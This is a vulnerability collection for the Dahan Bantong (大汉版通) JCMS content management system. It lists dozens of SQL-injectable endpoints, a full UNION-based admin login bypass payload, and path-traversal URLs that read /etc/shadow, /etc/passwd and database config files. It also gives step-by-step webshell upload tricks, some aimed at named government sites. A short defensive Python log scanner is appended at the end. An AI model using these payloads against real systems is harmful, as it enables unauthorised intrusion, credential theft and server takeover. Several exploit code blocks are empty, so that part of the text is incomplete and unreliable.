A collection of vulnerabilities in 大汉版通 (Dahan Bantong)

1. SQL injection

/vc/vc/interface/index/que_scount.jsp?webid=1
/jcms/short_message/que_contact.jsp?vc_searchname=1
/jcms/short_message/que_recemsg.jsp?que_keywords=1&loginid=a
/jcms/workflow/design/que_model.jsp?userid=
/jcms/workflow/objectbox/selectx_search.jsp?spell=1
/jcms/workflow/objectbox/selectx_list.jsp?id=1
/jcms/workflow/objectbox/selectx_search.jsp?spell=jcms
/jcms/short_message/opr_domsg.jsp?fn=DA&i_id=1&vc_name=a
/jcms/workflow/sys/que_dictionary.jsp?que_keywords1=aaa
/jcms/m_5_d/opr_wap_col.jsp?strid=122222222&fn_billstatus=D
/jcms/m_5_e/init/sitesearch/opr_classajax.jsp?classid=1
/jcms/m_5_5/m_5_5_1/que_flow.jsp?que_keywords1=aaa
/jcms/m_5_3/attach/que_attach_choose.jsp?classid=-1&que_keywords1=1
/jcms/workflow/objectbox/selectx_czuserlist.jsp?appid=1&nodecode=3&handlerid=4&flowcode=2
/jcms/m_5_e/module/messagebook/opr_messagebook_column.jsp?fn_billstatus=D&i_ID=1
/jcms/m_5_e/init/download/downfile.jsp?filename=1
/jsearch/objectbox/selectx_search.jsp?spell=jsearch
/jphoto/objectbox/selectx_search.jsp?spell=1
/jis/objectbox/selx_userlist.jsp?fn_Keywords=1
/jis/objectbox/selx_search.jsp?spell=jis
/jis/objectbox/selx_list.jsp?id=1
/jis/manage/datasbase/closeup.jsp?id=1
/jis/manage/datasbase/startup.jsp?id=1
/xxgk/workflow/objectbox/selectx_list.jsp?id=1
/xxgk/workflow//statistics/que_apply_sta.jsp?userid=0&modelname=1&modelname1=2
/xxgk/short_message/que_recemsg.jsp?que_keywords=1&loginid=1&boxtype=1&que_keywords1=1&que_startdate=1&que_enddate=1
/module/sitesearch/index.jsp?columnid=81
/module/rss/rssfeed.jsp?colid=23
/vipchat/home/front/search/opr_chatsearch.jsp?action=simplesearch&keywords=
/zfxxgk/serviceobjectinfo.jsp?servicebm=
/zfxxgk/subjectinfo.jsp?subjectbm=

  1. In the default backend login page of the 大汉版通 JCMS content management system (JCMS2010), the username is passed into the database query without any sanitisation, producing a SQL injection vulnerability.
  2. Exploit test:
  Backend login page: http://www.target.com/jcms/
  Username: [php]x' union select '00000','admin','AEY=',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'1',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from dual--[/php]
  Password: 1
  Here '00000' is the field that identifies the administrator user group; 'admin' is the administrator username; 'AEY=' is the encrypted password, which decrypts to '1'; the later '1' means the account is enabled.

2. Arbitrary file read

/xxgk/jcms_files/jcms1/web1/site/zfxxgk/download/downannals.jsp?name=....//....//zfxxgk/subjectstyle.xml&webid=52&type=41&downname=a.txt
/jcms/jcms_files/jcms1/web1/site/module/oss/downfile.jsp?filename=a.txt&pathfile=media/-1/....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//proc/self/environ
/vc/vc/columncount/tem/downfile.jsp?filename=/etc/passwd&savename=down.txt
/jcms/m_5_7/replace/export.jsp?filename=/etc/shadow&savename=pass
/jcms/jcms_files/jcms1/web1/site/module/comment/opr_readfile.jsp?filename=../../../../../../WEB-INF/ini/merpserver.ini
/jcms/jcms_files/jcms1/web1/site/module/comment/opr_readfile.jsp?filename=../../../../../../WEB-INF/web.xml
/jis/down.jsp?pathfile=web-inf/config/dbconfig.xml
/jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig

3. Upload getshell vulnerabilities

Too many to list them all.

  1. jcms
  Save the following code as an .htm file:
  [php]
  [/php]
  Path: /jcms/jcms_files/jcms/web0/site/module/idea/tem/upload/+uploadname
  Opening it lets you upload arbitrary files directly. After upload, the file path is:
  [php] /jcms/jcms_files/jcms/web0/site/module/idea/tem/upload/+your uploaded filename[/php]

  2. vc
  So we construct the following Exp to obtain a shell directly:
  [php]
  [/php]
  Save it as .htm and you can upload arbitrary files directly. Build a zip archive: the images folder holds our shell, and default.html contains:

  The extraction path is: /vc/vc/html/upload/shell/images/<filename>

  3. jcms
  jcms/setup/opr_upload.jsp
  This function imports an update package with a .zip suffix... and finally extracts the shell into the update directory: /jcms/update

  4. xxgk
  http://xxgk.lyg.gov.cn//xxgk/m_5_e/module/review/opr_review_template.jsp
  After opening this page, upload our shell.zip directly and click submit; it is extracted on the server and Customize.jsp is generated at:
  /xxgk/jcms_files/jcms1/web0/site/zfxxgk/letterbox/template/-1/Customize.jsp
  Note: across multiple tests this is usually the path; in a small number of cases the numbers after jcms1 and web0 may differ.

  5. /xxgk/m_6_1/opr_modal.jsp
  step1: rename the users.jsp we want to upload to user.htm
  step2: capture the upload request and rename user.htm back to user.jsp
  Click GO and user.jsp is generated in the following directory:
  /xxgk/jcms_files/jcms1/web0/site/zfxxgk/ysqgk/modal/1/<your filename>
  Note: because the upload path in the code is "/jcms_files/jcms" + strAppID + "/web" + nWebID + "/site/zfxxgk/ysqgk/modal/" + strModaltype + "/" + filename, the path may need to be adjusted accordingly.
  http://xxgk.site.cn/xxgk/jcms_files/jcms1/web0/site/zfxxgk/ysqgk/modal/1/users.jsp

  6. /xxgk/m_5_7/replace/opr_importinfo.jsp
  First: rename the file we want to upload to shell.xml, then capture the request and change it back.
  Before the verification, a quick note on the part I find interesting: when we click upload, capture the request with Burp Suite, modify it and submit. Two places need to be modified:
  Content-Disposition: form-data; name="file1"; filename="shell.xml"
  Content-Disposition: form-data; name="file3"; filename="shell.jsp"
  Note: name must be changed to something other than file1, otherwise the upload does not succeed (this is the part I find interesting).
  After submission, shell.jsp is generated in the /m_5_7/replace/temp/ directory.
  http://xxgk.weifang.gov.cn/xxgk/m_5_7/replace/opr_importinfo.jsp?fn_billstatus=1

  7. /xxgk/m_5_5/m_5_5_3/import_style.jsp
  Rename xiao.jspx to xiao.xml and upload it. After submitting, capture the request and change the filename to 1.jspx.
  At this point xiao.jspx has been generated in the /m_5_5/m_5_5_3/temp/upload/ directory. Visiting it succeeds:
  /xxgk//m_5_5/m_5_5_3/temp/upload/xiao.jspx

  8. Truncation upload
  [php]
  [/php]
  [php]
  [/php]
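The "....//" traversal reads in section 2 and the UNION-based injection in section 1 both leave clear traces in web server access logs. The following Python is an added defender-side example, not code from the original post or from 大汉版通: it shows why a single-pass "../" filter is defeated by "....//", the fixed-point variant that is not, and a small scanner that labels such requests in constructed sample log lines (the client IPs, timestamps and log lines are made up for the example).

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not from the original post): a
# '....//' traversal read, a UNION injection, and one benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0800] "GET /jcms/jcms_files/jcms1/web1/site/module/oss/downfile.jsp?filename=a.txt&pathfile=media/-1/....//....//....//proc/self/environ HTTP/1.1" 200 512
10.0.0.6 - - [01/Jan/2024:10:00:02 +0800] "GET /jcms/short_message/que_contact.jsp?vc_searchname=1%27%20union%20select%20%2700000%27%2C%27admin%27%20from%20dual-- HTTP/1.1" 200 310
10.0.0.7 - - [01/Jan/2024:10:00:03 +0800] "GET /module/rss/rssfeed.jsp?colid=23 HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3})')
SQLI_RE = re.compile(r"\bunion\b.*\bselect\b|\bfrom\s+dual\b", re.I)

def strip_once(value):
    """Single-pass filter that deletes every '../'. This is what '....//'
    is built to survive: removing its inner '../' leaves '../' behind."""
    return value.replace("../", "")

def strip_to_fixpoint(value):
    """Hardened form: keep stripping until the string stops changing."""
    while True:
        stripped = strip_once(value)
        if stripped == value:
            return value
        value = stripped

def findings_for(query):
    """Labels for one query string (parse_qsl already percent-decodes)."""
    found = set()
    for _, val in parse_qsl(query, keep_blank_values=True):
        if "../" in val:
            # A value a second pass still changes was crafted for a one-pass filter.
            nested = strip_once(val) != strip_to_fixpoint(val)
            found.add("traversal-nested-bypass" if nested else "traversal")
        if SQLI_RE.search(val):
            found.add("sqli")
    return sorted(found)

def scan_log(text):
    """Return (client, path, labels) for every suspicious request line."""
    hits = []
    for m in filter(None, map(LOG_RE.match, text.splitlines())):
        client, _method, target, _status = m.groups()
        parts = urlsplit(target)
        labels = findings_for(parts.query)
        if labels:
            hits.append((client, parts.path, labels))
    return hits
```

Running scan_log(SAMPLE_LOG) flags the first two lines only; the plain "../" form from the opr_readfile.jsp reads would be labelled "traversal" rather than "traversal-nested-bypass".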
